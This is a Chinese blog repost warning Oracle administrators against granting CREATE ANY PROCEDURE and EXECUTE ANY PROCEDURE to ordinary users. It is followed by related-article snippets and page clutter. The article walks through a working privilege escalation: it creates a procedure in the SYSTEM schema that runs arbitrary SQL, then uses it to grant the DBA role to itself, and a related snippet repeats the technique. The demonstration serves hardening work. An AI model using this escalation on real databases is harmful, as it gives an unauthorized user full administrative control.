create any procedure,execute any procedure不该同时授权给普通用户

最新推荐文章于 2021-09-09 08:46:23 发布
最新推荐文章于 2021-09-09 08:46:23 发布
阅读量427 收藏 1
点赞数
文章标签: 数据库

 

如果管理员把create any procedure和execute any procedure系统权限授权给一个普通用户,普通用户可以通过一个过程把DBA角色非法授权给自己,演示如下:

SQL> create user naruto identified by naruto;

用户已创建。

SQL> grant create session to naruto;

授权成功。
SQL> grant create session,create any procedure,execute any procedure to naruto;

授权成功。

SQL> select * from session_privs;

PRIVILEGE
-----------------------------------------

CREATE SESSION
CREATE ANY PROCEDURE
EXECUTE ANY PROCEDURE

可以看到用户naruto只有以上三个权限。


SQL> conn naruto/naruto
已连接。
SQL> create procedure system.p1( a varchar2 )
  2  as
  3  begin
  4  execute immediate a;
  5  end;
  6  /

过程已创建。

SQL> exec system.p1('grant DBA to naruto');

PL/SQL 过程已成功完成。

SQL> conn naruto/naruto
已连接。

SQL> select * from session_privs;

PRIVILEGE
-----------------------------------

ALTER SYSTEM
AUDIT SYSTEM
CREATE SESSION
ALTER SESSION
RESTRICTED SESSION
CREATE TABLESPACE
ALTER TABLESPACE
MANAGE TABLESPACE
DROP TABLESPACE
UNLIMITED TABLESPACE
CREATE USER

PRIVILEGE
-----------------------------------

BECOME USER
ALTER USER
DROP USER
CREATE ROLLBACK SEGMENT
ALTER ROLLBACK SEGMENT
DROP ROLLBACK SEGMENT
CREATE TABLE
CREATE ANY TABLE
ALTER ANY TABLE
BACKUP ANY TABLE
DROP ANY TABLE
。。。

已选择161行。


可以看到普通用户naruto获得了管理员的所有权限。

 

 

 

 


 

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/25361369/viewspace-700415/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/25361369/viewspace-700415/

cky0597
关注
Oracle用户授权的一些知识点
Sebastien23的博客
04-29 311
对于user1在user2模式下创建的表,如果user1需要查询或DML权限,可以通过单独授予对象权限来实现、也可以通过授予。权限后,user1可以在user2模式下创建表,但是user1对创建的表。可以看到存储过程、函数、包共用一套权限,建表权限默认包含建索引权限。对于user1在user2模式下创建的表,
oracle 执行包体命令,Oracle 过程(Procedure)、函数(Function)、包(Package)、触发器(Trigger)...
weixin_29605297的博客
04-07 1689
编译过程:alter procedure New_procedure complile;为了能够执行此命令,需要拥有这个过程,或者具有alter any procedure系统权限。编译函数:alter function New_function compile;为了能够执行,需要拥有此函数,或者具有alter any procedure系统权限。编译包:later package [user.]...
提权create/execute any procedure
weixin_34176694的博客
09-15 148
如果用户eygle 有角色 create any procedureexecute any procedure则用户 eygle 创建并执行如下存储过程则,可以自己提权到dba角色。create or replace procedure system.do(p_text varchar2)isbeginexecute immediate p_text;end;...
给一个用户授予CREATE ANY PROCEDUREEXECUTE ANY PROCEDURE带来的后果
kepa520的博客
12-19 3012
原文地址:http://blog.itpub.net/16162908/viewspace-594904/ 给一个用户授予CREATE ANY PROCEDUREEXECUTE ANY PROCEDURE带来的后果。 创建一个新用户,并且给这个用户授予CREATE SESSION的权限,使其能连接到会话。 SQL> CONN / AS SYSDBA Connected. SQL
有了 "CREATE SESSION" and "EXECUTE ANY PROCEDURE"
cuiganglan0701的博客
08-17 100
今天察看7445的错发现一贴子,记录如下: http://www.eygle.com/archives/2005/05/why_execute_any.html TOM曾经多次说过:All I need is "...
Oracle给用户授权truncatetable的实现方案
09-09
在Oracle数据库管理中,有时需要为特定用户授权执行`TRUNCATE TABLE`操作,以便他们在自己的职责范围内能够清理数据而不影响其他用户。然而,Oracle不支持直接为用户授予针对单个表的`TRUNCATE`权限,而是通常将更...
create function mysql_mysql8 参考手册--CREATE PROCEDURECREATE FUNCTION语句
weixin_32272937的博客
02-15 588
CREATE[DEFINER = user]PROCEDURE sp_name ([proc_parameter[,...]])[characteristic ...] routine_bodyCREATE[DEFINER = user]FUNCTION sp_name ([func_parameter[,...]])RETURNS type[characteristic ...] routine...
CREATE USER cedar IDENTIFIED BY cedar DEFAULT TABLESPACE CEDAR_DATA TEMPORARY TABLESPACE TEMP PROFILE DEFAULT ACCOUNT UNLOCK; -- 5 Roles for cedar GRANT DBA TO cedar; GRANT RESOURCE TO cedar WITH ADMIN OPTION; GRANT AQ_ADMINISTRATOR_ROLE TO cedar; GRANT CONNECT TO cedar WITH ADMIN OPTION; GRANT AQ_USER_ROLE TO cedar; ALTER USER cedar DEFAULT ROLE ALL; -- 44 System Privileges for cedar GRANT CREATE ANY DIRECTORY TO cedar WITH ADMIN OPTION; GRANT CREATE PUBLIC SYNONYM TO cedar WITH ADMIN OPTION; GRANT EXECUTE ANY CLASS TO cedar WITH ADMIN OPTION; GRANT DROP ANY VIEW TO cedar WITH ADMIN OPTION; GRANT CREATE CLUSTER TO cedar; GRANT ALTER SYSTEM TO cedar; GRANT UPDATE ANY TABLE TO cedar; GRANT INSERT ANY TABLE TO cedar; GRANT LOCK ANY TABLE TO cedar; GRANT CREATE EXTERNAL JOB TO cedar WITH ADMIN OPTION; GRANT EXECUTE ANY PROGRAM TO cedar WITH ADMIN OPTION; GRANT CREATE JOB TO cedar WITH ADMIN OPTION; GRANT DROP ANY DIRECTORY TO cedar WITH ADMIN OPTION; GRANT ALTER ANY TRIGGER TO cedar; GRANT CREATE DATABASE LINK TO cedar; GRANT DROP ANY TABLE TO cedar WITH ADMIN OPTION; GRANT CREATE TABLE TO cedar WITH ADMIN OPTION; GRANT QUERY REWRITE TO cedar; GRANT ANALYZE ANY TO cedar; GRANT DROP ANY TRIGGER TO cedar; GRANT EXECUTE ANY PROCEDURE TO cedar; GRANT SELECT ANY TABLE TO cedar WITH ADMIN OPTION; GRANT ALTER ANY TABLE TO cedar; GRANT UNLIMITED TABLESPACE TO cedar WITH ADMIN OPTION; GRANT CREATE SESSION TO cedar; GRANT CREATE ANY TRIGGER TO cedar; GRANT DROP ANY PROCEDURE TO cedar WITH ADMIN OPTION; GRANT ALTER ANY PROCEDURE TO cedar; GRANT DROP PUBLIC SYNONYM TO cedar WITH ADMIN OPTION; GRANT DROP ANY SYNONYM TO cedar WITH ADMIN OPTION; GRANT MANAGE SCHEDULER TO cedar WITH ADMIN OPTION; GRANT CREATE ANY PROCEDURE TO cedar; GRANT CREATE PROCEDURE TO cedar WITH ADMIN OPTION; GRANT CREATE SEQUENCE TO cedar; GRANT CREATE VIEW TO cedar WITH ADMIN OPTION; GRANT CREATE SYNONYM TO cedar; GRANT DROP ANY INDEX TO cedar; GRANT DELETE ANY TABLE TO cedar; GRANT CREATE ANY TABLE TO cedar; GRANT CREATE ANY JOB TO cedar WITH ADMIN OPTION; GRANT SELECT ANY DICTIONARY TO cedar WITH ADMIN OPTION; GRANT CREATE ROLE TO cedar; GRANT CREATE ANY SYNONYM TO cedar WITH ADMIN OPTION; GRANT ALTER SESSION TO cedar WITH ADMIN OPTION; GRANT EXECUTE ON sys.dbms_aq TO cedar; GRANT EXECUTE ON sys.dbms_aqadm TO cedar; GRANT EXECUTE ON sys.dbms_network_acl_admin TO cedar; GRANT ALL ON sys.DBMS_LOCK TO cedar; 这个SQL在oracle 能用吗
最新发布
06-08
其中,该用户被授予了 DBA、RESOURCE、AQ_ADMINISTRATOR_ROLE、CONNECT、AQ_USER_ROLE 等角色,也被授予了 44 个系统权限(如 CREATE ANY DIRECTORY、EXECUTE ANY CLASS、CREATE TABLE 等)。此外,该用户还被授予了...
oracle表授权给用户,oracle创建用户及授权创建表
weixin_36361600的博客
04-02 1174
--================================--Oracle用户、对象权限、系统权限--================================建立表空间和用户的步骤:用户建立:createuser用户名identifiedby"密码";授权:grantcreatesessionto用户名;grantcreatetableto用户名;g...
Oracle 授权编译指定包、函数、存储过程
Hehuyi_In的博客
04-26 3275
Oracle中编译包、函数、存储过程需要有 ALTER ANY PROCEDURE 权限 如果是通过CREATE OR REPLACE PACKAGE 方式编译,则需要添加create ANY PROCEDURE 权限 一般还会需要debug权限 grant create ANY PROCEDURE,ALTER ANY PROCEDURE to test; --debug grant debu...
Oracle基础——第四章 用户管理及表空间
DBA@Robin
04-01 3691
本章目标   数据库用户管理 数据库权限管理 数据库存储结构   数据库用户管理   1.        创建用户 a)        语法   可以使用CREATE USER语句创建用户 语法如下 CREATE USER user_name IDENTIFIED BY password [DEFAULT TABLESPACE default_tablespace]
数据库系统权限
鲨鱼胃的博客
10-30 997
alter any cluster 修改任意簇的权限   alter any index 修改任意索引的权限   alter any role 修改任意角色的权限   alter any sequence 修改任意序列的权限   alter any snapshot 修改任意快照的权限   alter any table 修改任意表的权限   alter any trigger 修改任意触发器的权限   alter cluster 修改拥有簇的权限   alter database 修改数据库的权限   a
Oracle-12-数据库安全性(用户&权限)
长弓晗炅的博客
06-26 785
1、用户 ch 2、系统特权 3、对象特权 4、角色
linuxoracle查看用户权限_实现Oracle授予用户权限的一个实例
weixin_42305264的博客
02-07 487
本文将从用户创建讲起,特别讲述Oracle授予用户权限的一个实例,希望对大家了解Oracle授予用户权限有所帮助。这两天在测数据库同步软件的时候,需要在Oracle里创建一个用户名和密码均为SYSDATA的用户,找了找资料,创建成功,现将Oracle中用户的创建和授予命令摘录下来:1、Linux 下Oracle的启动以Oracle身份登录启动lsnrctl start登录sqplus /nolog...
第十章 SQL命令 CREATE PROCEDURE(一)
yaoxin521123的博客
09-09 7796
文章目录 第十章 SQL命令 CREATE PROCEDURE(一)大纲参数描述参数procnameparameter_list 第十章 SQL命令 CREATE PROCEDURE(一) 创建作为SQL存储过程公开的方法或查询。 大纲 CREATE PROCEDURE procname(parameter_list) [ characteristics ] [ LANGUAGE SQL ] BEGIN code_body ; END CREATE PROCEDURE procn
Oracle的对象权限、角色权限、系统权限
coco3600的博客
06-15 1206
Oracle的对象权限、角色权限、系统权限 一、用户与模式 用户:对数据库的访问,需要以适当用户身份通过验证,并具有相关权限来完成一系列动作 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值